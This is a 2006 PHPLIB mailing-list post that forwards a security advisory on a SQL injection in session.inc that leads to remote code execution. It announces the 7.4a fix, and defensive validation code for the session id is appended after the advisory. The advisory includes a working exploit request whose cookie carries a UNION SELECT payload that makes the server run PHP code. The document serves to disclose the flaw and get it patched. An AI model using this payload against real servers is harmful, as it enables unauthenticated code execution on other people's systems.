[Phplib-users] Upcoming GulfTech Security Research advisory
From: Richard A. <rh...@ju...> - 2006-03-02 03:35:11
Greetings,

James at GulfTech Security Research has kindly allowed me to post a draft of his upcoming security advisory to this list before he releases it to the general community. This will give PHPLIB users some time to upgrade before any potential exploit becomes available.

I believe this only affects session.inc, not session4.inc. So if you are using PHPLIB with php4 sessions, this particular problem shouldn't be an issue for you.

The solution to this vulnerability is to upgrade to 7.4a, which is available from our Sourceforge download page:

http://sourceforge.net/project/showfiles.php?group_id=31885

Or if you prefer, manually apply a patch to php/session.inc:

http://cvs.sourceforge.net/viewcvs.py/phplib/php-lib-stable/php/session.inc?r1=1.19&r2=1.20

My thanks to James at GulfTech Security Research for alerting us to this problem and allowing time to release a solution before releasing the advisory.

...Richard.

---begin forwarded text

GulfTech Security Research Advisory

Remote Code Execution:

There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection and/or Remote Code Execution.

  ## Propagate the session id according to mode and lifetime.
  ## Will create a new id if necessary. To take over abandoned sessions,
  ## one may provide the new session id as a parameter (not recommended).
  function get_id($id = "") {
    global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;

    $this->newid=true;
    $this->name = $this->cookiename==""?$this->classname:$this->cookiename;

    if ( "" == $id ) {
      $this->newid=false;
      switch ($this->mode) {
        case "get":
          $id = isset($HTTP_GET_VARS[$this->name]) ?
                  $HTTP_GET_VARS[$this->name] :
                  ( isset($HTTP_POST_VARS[$this->name]) ?
                    $HTTP_POST_VARS[$this->name] : "") ;
        break;
        case "cookie":
          $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
                  $HTTP_COOKIE_VARS[$this->name] : "";
        break;
        default:
          die("This has not been coded yet.");
        break;
      }
    }

    ### do not accept user provided ids for creation
    if($id != "" && $this->block_alien_sid) {
      # somehow an id was provided by the user
      if($this->that->ac_get_value($id, $this->name) == "") {
        # no - the id doesn't exist in the database: Ignore it!
        $id = "";
      }
    }

The above code is from sessions.inc @ lines 85-121. The variable $id gets its values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value(), which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call.

GET /phplib/pages/index.php3 HTTP/1.1
Host: example.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT

For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call. This could obviously be used for more sinister purposes such as running arbitrary system commands and the like. Also, since user authentication is not necessary to exploit this vulnerability, the risk of being exploited is much higher.

---end forwarded text
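As an added example (not from the advisory, the 7.4a patch, or PHPLIB itself), this is the check a defender would want in front of that ac_get_value() call: reject any session id that does not have the shape PHPLIB generates before it reaches the database, and bind it as a query parameter anyway. Assumptions: PHPLIB ids are 32 lowercase hex characters (md5 output), the table active_sessions(sid, name, val) is a hypothetical stand-in for PHPLIB's session storage, and PHP 7+ with pdo_sqlite is available.

```php
<?php
// Added example, not PHPLIB code: a strict allowlist check for the session id
// taken from a cookie or GET parameter, applied before any database lookup.
// Assumption: PHPLIB session ids are 32 hex characters (md5 output).

const SID_PATTERN = '/^[0-9a-f]{32}$/';

// Return the id if it is well-formed, otherwise "" (treated as "no id given"),
// which is the same outcome the original get_id() uses for an unknown id.
function safe_session_id(string $id): string {
    return preg_match(SID_PATTERN, $id) === 1 ? $id : '';
}

// Defence in depth: even a validated id reaches the query as a bound
// parameter rather than by string concatenation. The table layout
// active_sessions(sid, name, val) is a hypothetical model of PHPLIB's ac_* storage.
function ac_get_value_safe(PDO $db, string $id, string $name): string {
    $id = safe_session_id($id);
    if ($id === '') {
        return '';
    }
    $stmt = $db->prepare('SELECT val FROM active_sessions WHERE sid = :sid AND name = :name');
    $stmt->execute([':sid' => $id, ':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? '' : $row['val'];
}

// Self-check against an in-memory SQLite database holding one constructed session.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE active_sessions (sid TEXT, name TEXT, val TEXT)');
$db->exec("INSERT INTO active_sessions VALUES "
        . "('0123456789abcdef0123456789abcdef', 'Example_Session', 'serialized-data')");

$good = '0123456789abcdef0123456789abcdef';            // constructed valid id
$bad  = "' UNION SELECT 'cGhwaW5mbygpOw=='/*";         // the cookie value from the advisory

// The well-formed id is looked up; the injected value never reaches the query.
var_dump(ac_get_value_safe($db, $good, 'Example_Session'));
var_dump(ac_get_value_safe($db, $bad,  'Example_Session'));
```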